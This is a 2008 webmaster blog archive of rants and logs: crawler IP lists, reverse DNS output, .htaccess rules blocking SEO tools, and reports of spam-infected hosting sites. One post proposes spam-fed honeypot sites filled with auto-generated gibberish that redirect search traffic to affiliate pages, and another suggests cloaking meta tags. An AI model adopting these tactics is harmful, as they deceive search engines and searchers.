Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.



I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness

This summary is not available. Please click here to view the post.

Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continue series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed as I think they assume it's always going to be used by the site owner but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used:

209.40.115.202 "SEOmoz-bot"
209.40.116.200 "SEOmoz-bot"
The IP's belong to HopOne which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: 209.40.96.0 - 209.40.127.255
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

"SMILESEOTools"
"SMILE SEO Tools"
"SMILESEOTools(Windows;compatible;MSIE6.0;I;WindowsNT5.0)"
The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IP's using this directory spamware, probably mostly proxy sites in Russia would be my guess as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IP's using SMILE SEO Tools for your veiwing pleasure:
217.20.168.113
217.151.225.42
213.247.143.205
213.232.196.102
213.184.238.34
213.170.69.66
212.96.222.197
212.96.200.33
212.96.200.115
212.59.98.125
212.220.104.230
204.15.76.250
201.12.176.18
195.91.168.193
195.72.145.7
195.72.142.106
195.46.188.3
195.239.202.65
195.234.114.122
195.234.109.71
195.218.220.26
195.162.39.54
195.131.84.202
195.131.188.138
195.122.250.205
194.44.191.7
194.24.240.23
193.239.255.22
193.238.96.5
193.17.174.7
91.77.38.45
91.76.44.134
91.76.34.0
91.76.159.205
91.76.156.161
91.76.111.247
91.76.108.170
91.124.75.182
91.124.35.208
91.124.245.129
91.124.232.195
91.124.165.97
91.124.143.254
91.122.51.213
90.188.71.41
89.250.2.129
89.19.164.14
89.179.97.170
89.179.96.253
89.179.110.182
89.179.103.190
89.178.209.180
89.178.143.161
87.240.15.33
87.240.15.26
87.237.113.6
87.117.35.56
87.117.33.5
86.57.220.142
85.94.34.227
85.238.106.44
85.238.106.35
85.236.26.202
85.192.165.43
85.141.228.16
85.141.213.13
85.140.58.175
85.140.54.95
85.140.53.21
85.140.52.233
85.140.154.97
85.140.118.4
85.140.117.215
85.140.116.105
84.42.57.72
84.253.75.67
84.154.102.78
83.237.96.4
83.237.76.106
83.237.211.116
83.237.200.54
83.237.186.74
83.237.169.118
83.167.116.85
83.167.112.224
82.207.36.70
82.207.14.51
82.207.117.186
82.207.0.248
81.95.178.185
81.94.22.114
81.3.158.138
81.25.53.49
81.200.7.88
80.92.96.7
80.80.111.240
80.248.156.79
78.106.58.185
78.106.189.47
77.247.172.250
77.247.165.196
77.247.165.14
77.247.160.89
77.239.192.6
77.235.113.131
77.235.101.11
77.123.62.125
77.122.231.9
74.232.4.137
62.33.7.146
62.213.18.70
62.168.234.78
62.140.244.20
62.118.2.146
Just to help you understand where these IP's were coming from, here's the reverse DNS of the same list:
ppp91-77-38-45.pppoe.mtu-net.ru.
ppp91-76-44-134.pppoe.mtu-net.ru.
ppp91-76-34-0.pppoe.mtu-net.ru.
ppp91-76-159-205.pppoe.mtu-net.ru.
ppp91-76-156-161.pppoe.mtu-net.ru.
ppp91-76-111-247.pppoe.mtu-net.ru.
ppp91-76-108-170.pppoe.mtu-net.ru.
182-75-124-91.pool.ukrtel.net.
208-35-124-91.pool.ukrtel.net.
129-245-124-91.pool.ukrtel.net.
195-232-124-91.pool.ukrtel.net.
97-165-124-91.pool.ukrtel.net.
254-143-124-91.pool.ukrtel.net.
ppp91-122-51-213.pppoe.avangarddsl.ru.
41.71.188.90.adsl.tomsknet.ru.
nat.tushino.com.
hst14-nat.n.tc-exe.ru.
89-179-97-170.broadband.corbina.ru.
89-179-96-253.broadband.corbina.ru.
89-179-110-182.broadband.corbina.ru.
89-179-103-190.broadband.corbina.ru.
89-178-209-180.broadband.corbina.ru.
89-178-143-161.broadband.corbina.ru.
nat.a10.qwerty.ru.
nat1.a3.qwerty.ru.
6-113.admiral.tvoe.tv.
Host 56.35.117.87.in-addr.arpa not found: 3(NXDOMAIN)
5.33.117.87.donpac.ru.
220-142.pppoe.vitebsk.by.
85.94.34.227.adsl.sta.mcn.ru.
85-238-106-44.broadband.tenet.odessa.ua.
85-238-106-35.broadband.tenet.odessa.ua.
Host 202.26.236.85.in-addr.arpa not found: 3(NXDOMAIN)
85-192-165-43.dsl.esoo.ru.
ppp85-141-228-16.pppoe.mtu-net.ru.
ppp85-141-213-13.pppoe.mtu-net.ru.
ppp85-140-58-175.pppoe.mtu-net.ru.
ppp85-140-54-95.pppoe.mtu-net.ru.
ppp85-140-53-21.pppoe.mtu-net.ru.
ppp85-140-52-233.pppoe.mtu-net.ru.
ppp85-140-154-97.pppoe.mtu-net.ru.
ppp85-140-118-4.pppoe.mtu-net.ru.
ppp85-140-117-215.pppoe.mtu-net.ru.
ppp85-140-116-105.pppoe.mtu-net.ru.
Host 72.57.42.84.in-addr.arpa not found: 3(NXDOMAIN)
client1-3.amtelsvyaz.ru.
p549A664E.dip.t-dialin.net.
ppp83-237-96-4.pppoe.mtu-net.ru.
all-seminars.ru.
ppp83-237-211-116.pppoe.mtu-net.ru.
ppp83-237-200-54.pppoe.mtu-net.ru.
ppp83-237-186-74.pppoe.mtu-net.ru.
ppp83-237-169-118.pppoe.mtu-net.ru.
n116h85.catv.ext.ru.
n112h224.catv.ext.ru.
Host 70.36.207.82.in-addr.arpa not found: 3(NXDOMAIN)
pool-2user51.dc.ukrtel.net.
us.com.ua.
Host 248.0.207.82.in-addr.arpa not found: 3(NXDOMAIN)
185.178.95.81.in-addr.arpa turnskin.kiev.ua.
185.178.95.81.in-addr.arpa werewolf.kiev.ua.
185.178.95.81.in-addr.arpa filippova.kiev.ua.
185.178.95.81.in-addr.arpa rogovskiy.kiev.ua.
185.178.95.81.in-addr.arpa rogovskaya.kiev.ua.
185.178.95.81.in-addr.arpa prudaev.kiev.ua.
185.178.95.81.in-addr.arpa filippov.kiev.ua.
114.22.94.81.in-addr.arpa vpnpool-81-94-22-114.users.mns.ru.
Host 138.158.3.81.in-addr.arpa not found: 3(NXDOMAIN)
49.53.25.81.in-addr.arpa NAT-81-25-53-49.ultranet.ru.
Host 88.7.200.81.in-addr.arpa not found: 2(SERVFAIL)
7.96.92.80.in-addr.arpa gw7.eth.zelcom.ru.
240.111.80.80.in-addr.arpa ce2-ats32.aaanet.ru.
Host 79.156.248.80.in-addr.arpa not found: 3(NXDOMAIN)
185.58.106.78.in-addr.arpa 78-106-58-185.broadband.corbina.ru.
47.189.106.78.in-addr.arpa 78-106-189-47.broadband.corbina.ru.
Host 250.172.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 196.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 14.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 89.160.247.77.in-addr.arpa not found: 3(NXDOMAIN)
6.192.239.77.in-addr.arpa libra.comintel.ru.
131.113.235.77.in-addr.arpa 131.113.235.77.dyn.idknet.com.
11.101.235.77.in-addr.arpa 11.101.235.77.dyn.idknet.com.
125.62.123.77.in-addr.arpa unshaven.yawner.volia.net.
9.231.122.77.in-addr.arpa gearing.butter.volia.net.
137.4.232.74.in-addr.arpa adsl-232-4-137.asm.bellsouth.net.
146.7.33.62.in-addr.arpa gw.quaynet.ru.
70.18.213.62.in-addr.arpa h62-213-18-70.ip.syzran.ru.
78.234.168.62.in-addr.arpa virtual-234-78.utk.ru.
20.244.140.62.in-addr.arpa nat3.birulevo.net.
Host 146.2.118.62.in-addr.arpa not found: 3(NXDOMAIN)
113.168.20.217.in-addr.arpa mediainfotour-gw.cs1-nan.kv.wnet.ua.
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
205.143.247.213.in-addr.arpa is an alias for 205.192.143.247.213.in-addr.arpa.
205.192.143.247.213.in-addr.arpa host-205.SPM.213.247.143.192.0xfffffff0.macomnet.net.
102.196.232.213.in-addr.arpa host.hnt.ru.
34.238.184.213.in-addr.arpa 34-nat.cosmostv.by.
66.69.170.213.in-addr.arpa relay.volex.spb.ru.
Host 197.222.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 33.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 115.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 125.98.59.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 230.104.220.212.in-addr.arpa not found: 3(NXDOMAIN)
250.76.15.204.in-addr.arpa elanora.aatikah.com.
18.176.12.201.in-addr.arpa 201-12-176-18.intelignet.com.br.
193.168.91.195.in-addr.arpa h195-91-168-193.ln.rinet.ru.
7.145.72.195.in-addr.arpa user-195.72.145.7.lvivnet.org.
106.142.72.195.in-addr.arpa gw.itstime.ru.
3.188.46.195.in-addr.arpa ts1-b3.Irkutsk.dial.rol.ru.
65.202.239.195.in-addr.arpa ts1-a65.Irkutsk.dial.rol.ru.
122.114.234.195.in-addr.arpa 195.234.114.122.ukrlink.net.ua.
;; connection timed out; no servers could be reached
26.220.218.195.in-addr.arpa adsl-stat-0534.comch.ru.
Host 54.39.162.195.in-addr.arpa not found: 3(NXDOMAIN)
202.84.131.195.in-addr.arpa cache.wplus.net.
Host 138.188.131.195.in-addr.arpa not found: 3(NXDOMAIN)
205.250.122.195.in-addr.arpa 205.250.nat.smilenet.sandy.ru.
7.191.44.194.in-addr.arpa mail2.complex.lviv.ua.
23.240.24.194.in-addr.arpa 23.240.dsl.westcall.net.
Host 22.255.239.193.in-addr.arpa not found: 3(NXDOMAIN)
5.96.238.193.in-addr.arpa nat.itt.net.ua.
7.174.17.193.in-addr.arpa pptp-out2.radiokom.kr.ua
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.

Heck, just block the entire country of Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.

More Pesky SEO Tools To Block

Seems there is something in Germany called SEO.AG that has been pestering my site for quite some time.

The IP and User Agent it uses is:

85.214.35.2 "SEO[.AG] - Search Engine Optimizer Bot [http://www.seo.ag]"
However, they also run a web proxy on 85.214.35.2 so you have to block the IP to stop all the nonsense.

I'm not sure which is worse, the scrapers, proxies, aggrators, or the SEOs and their tools.

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's no where else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tool's here comes one of them trying to crawl one of my websites.

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why does Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory are changed for the same content on a different site so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look to deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the top of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers which will block many other SEO tools. If you don't understand the white list method and it scares you, there's a few good black lists around too.

This is a limited sample for informational purposes only just to give an idea how it works, see the thread linked above for more in depth samples by WebSavvy, just be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.

Block Bots and Speeding Crawlers
- You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Planks AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.

Block Snoops From Robots.txt - Don't allow anyone other that your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lot's of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easy.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

Especially if you combine cloaking meta tags with the NOARCHIVE option described above so then it's completely hidden from prying eyes.













Monday, February 18, 2008

Hakia Search Engine Spotted?

Hakia has been advertising their search engine in beta for quite some time and the only thing I've ever seen from them hitting my server is the following sporadic log entries:

06/28/2007 204.14.209.51 "Mozilla/4.0+"
10/05/2007 204.14.209.51 "Mozilla/4.0+"
11/09/2007 204.14.209.51 "Mozilla/4.0+"
12/19/2007 204.14.209.51 "Mozilla/4.0+"
02/18/2008 204.14.209.51 "Mozilla/4.0+"
Whatever it is didn't ask for robots.txt.

Here's their IP range:
HAKIA INC. IP00095 (NET-204-14-209-0-1)
204.14.209.0 - 204.14.209.255
Maybe someone knows more about this but I can't really find any information on them crawling and didn't notice anything on their site about them having a spider.

Thursday, February 14, 2008

MSIE 7 on Livebot IPs

Not sure what this means but I spotted an MSIE 7.0 user agent on the following Livebot IP addresses.

Here's the exact agent used:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Here's the IPs involved:
65.55.165.119 [livebot-65-55-165-119.search.live.com.]
65.55.165.38 [livebot-65-55-165-38.search.live.com.]
65.55.165.53 [livebot-65-55-165-53.search.live.com.]
65.55.165.66 [livebot-65-55-165-66.search.live.com.]
65.55.165.96 [livebot-65-55-165-96.search.live.com.]
Could mean anything from Live testing who has rigid user agent checking to making screen shots or they're reusing those IPs for other internal purposes, hard to say.

What's not hard to say is that those IPs with that user agent got automatically blocked on my site for being the wrong thing in the wrong place.

Tuesday, February 12, 2008

Jazztel Scraping Hotzone

Found a hotzone of activity from jazztel.es which has been attempting to scrape like crazy since the first of the year. Obviously they didn't get very far but keep trying and trying and I looked at the acitivity and it's definitely a bot running on 87.218.70.*

Here's the number of attempted pages per IP:

785 - 87.218.70.251
661 - 87.218.70.231
630 - 87.218.70.41
346 - 87.218.70.120
336 - 87.218.70.196
334 - 87.218.70.12
334 - 87.218.70.100
333 - 87.218.70.135
329 - 87.218.70.203
328 - 87.218.70.107
283 - 87.218.70.178
199 - 87.218.70.174
So it's probably a good idea to block 87.218.70.* just to be safe.

Wednesday, January 30, 2008

Make Money With a Black Hat Honeypot

Instead of trying to fight forum, blog and wiki spam it finally dawned on me that I was taking the wrong approach, don't fight the Black Hat spammers, monetize them!

The basic concept is built around the black hat spammers love of spamming so the first thing you need to do is set up a bunch of fake forums, blogs and wiki's using the popular open source software that the spammers love most. The trick is NOT to install any form of spam controls whatsoever, no captcha, no Askimet, nothing that will slow the spammer down. Let the spammers go wild with your honeypot site and let them make fake profiles, create spam threads and comments, it doesn't matter because we call all this spam "content" for this purpose.

For those advanced webmasters, take a look at some automatic content creation techniques that you can use to prime the honeypot sites with hundreds of bogus threads and blog posts of gibberish. This will trick the spammers into thinking you have a popular site where there will be lots of eyeballs looking at their spam yet nothing could be further from the truth as nobody will ever see their spam. If you want to be truly creative, use the text jumble or synonym switch on each spammers post to avoid duplicate content and also avoid matching their spam footprint which could be easily detected.

Right about now you must be asking yourself:
"Why in the hell would I build a site designed to be spammed?"

The answer is simple, the spam will become your content and hopefully your honeypot sites will pick up some traffic from the search engines. Best of all, the spammers will keep hitting your site daily so you'll have fresh content and we know how the search engines just love fresh content.

Once you get this traffic from the search engine, simply redirect that traffic to the appropriate affiliate landing page based on the search keyword and VOILA! you start making sales and the free money starts rolling in with the spammers doing all the work.

So there you have a simple yet elegant solution in one neat little bundle to let spammers make you money while you screw them over wasting their time spamming your honeypot sites.

Enjoy.

Very Bad Behavior for Crashed Joomla! Sites

Which is worse, a little spam or being offline for a month?

A major example shown below is because the bot blocker can crash the whole site and this poor webmaster has been in this state at a minimum, according to Google cache, since "retrieved on Jan 24, 2008". However, Live says the same site has been this way since "our crawler examined the site on 1/11/2008", so it's much worse.

Then I found another site down all month as Google cache shows "retrieved on Jan 2, 2008" so they've not only had anti-spam but anti-visitor as well, nothing to worry about.

Warning: botbehavior_bot() [function.botbehavior-bot]: SAFE MODE Restriction in effect. The script whose uid is 3647 is not allowed to access /home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php owned by uid 80 in /home/xxx/public_html/mambots/system/bb2_bot.php22

Warning:botbehavior_bot(/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php) [function.botbehavior-bot]: failed to open stream: Unknown error: 0 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Fatal error: botbehavior_bot() [function.require]: Failed opening required '/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php' (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Looked around the web and there are other Joomla! sites with similar issues as well which weren't completely fatal. I'm not sure why a few sites just crashed with the errors while others proceeded to display errors with page content.

All I can say is that these webmasters need a good site monitoring alarm service at a minimum.

Saturday, January 26, 2008

Yahoo Slurp Using New IPs

Yesterday my bot blocker notified me of a new range of IPs being used by Slurp that I haven't seen before.

This is a prime example of why I keep telling people that still use IP checking only to update their code and use full trip DNS checking to validate major search engines to avoid bouncing spiders with new IPs but people just don't listen.

Hope the following helps for anyone still validating Slurp by IP only.

The user agent:

"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
A few reverse DNS samples:
67.195.44.83 [lm302008.crawl.yahoo.net.]
67.195.44.80 [lm302005.crawl.yahoo.net.]
67.195.44.84 [lm302009.crawl.yahoo.net.]
67.195.44.103 [lm302028.crawl.yahoo.net.]
67.195.44.100 [lm302025.crawl.yahoo.net.]
67.195.44.96 [lm302021.crawl.yahoo.net.]
67.195.44.99 [lm302024.crawl.yahoo.net.]
67.195.44.92 [lm302017.crawl.yahoo.net.]
The complete list of new IPs Slurp used:
67.195.44.100
67.195.44.101
67.195.44.102
67.195.44.103
67.195.44.109
67.195.44.75
67.195.44.76
67.195.44.77
67.195.44.78
67.195.44.79
67.195.44.80
67.195.44.81
67.195.44.82
67.195.44.83
67.195.44.84
67.195.44.85
67.195.44.86
67.195.44.87
67.195.44.89
67.195.44.90
67.195.44.91
67.195.44.92
67.195.44.93
67.195.44.94
67.195.44.95
67.195.44.96
67.195.44.97
67.195.44.98
67.195.44.99

Apollo Hosting Shared Server Customers Appear To Be Hacked

One of my websites is a directory and when I last ran my link checker about 10 days ago, to validate that the sites were all still valid, several of them triggered a test that I installed to check for hacked sites. After doing a little bit of research they all turned out the be hosted on Apollo Hosting.

What I found were very large blocks of ads embedded in the home page of each compromised site for every kind of pharma product you've ever seen spammed with their links pointing to landing pages on multiple compromised servers including several universities. Some of the landing pages are also hosted on Apollo Hosting so they are being used to host both the hackers pharma links and pharma landing pages.

Took a quick look in Google and found a lot of references in Google about individual sites on Apollo being hacked but I don't think they know the extent of the problem.

Please note that these types of hackers don't seem infect every account on the server, they just infect a chunk of them based on some unknown criteria, so it's hit and miss which domains are infected. Perhaps individual accounts were hacked but I don't think so as I've seen this same type of thing on iPowerWeb (which now appears cleaned up), random sites, some servers had more sites infected, others just a few, who knows why.

Here's a few examples, view the HTML source to see all the embedded pharma ads typically at the bottom of the page:

Caution: disable javascript before you go to any domain

Server: secure1.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.251?pi=4&ob=SLD&oo=ASC
Sample 1: view-source:http://oceancyclery.com/
Sample 2: view-source:http://oldpeking.com/

Server: secure2.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.252
Sample 1: view-source:http://armandmercury.com/
Sample 2: view-source:http://altonaequipment.com/

Server: secure4.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.254
View the source on any domain in the list, not all are infected but it's a more
heavily server wide infestation...

So on and so forth, you get the idea.

I spot checked a handful of servers, but based on what I've run across in the past with other similar shared server infestations it's probably on all shared servers.

DISCLAIMER: The sites and servers referenced still contained the pharma ads at the time of this writing and may be cleaned up in the future. Follow the links to check the domains hosted to see if the problem still exists in the future.

Sunday, January 20, 2008

Sprint Broadband Saves Bacon Again

Last night I was working quickly trying to stop some asshole that I found attacking my site and was just about finished with the task when suddenly BLAMMO! my SSH session terminated.

My first thought was I had just done something bad and whacked the server.

In a bit of a panic I try to pull up the site in the Firefox, nothing, dead.

Is my internet connection down?

Nope, I can get to other web sites and my other servers in different data centers just fine.

Must be Comcast having a routing problem so I quickly confirm that there's a routing issue with a traceroute and breath a sigh of relief when I can access that server via my other server.

However, this doesn't solve the problem of the asshole that was waging war on my server still abusing the damn thing. The attacker was using a huge proxy list that was more current than mine plus some other things so it wasn't as simple as just blocking a single IP address or anything like that.

So I grabbed the Sprint Broadband USB stick, plugged it in, and a minute later was back on the server via a different network connection and finished blocking the attacker.

A few hours later Comcast was functioning properly again, but thanks to Sprint Broadband I no longer feel like I'm being held hostage when Comcast's service has problems.

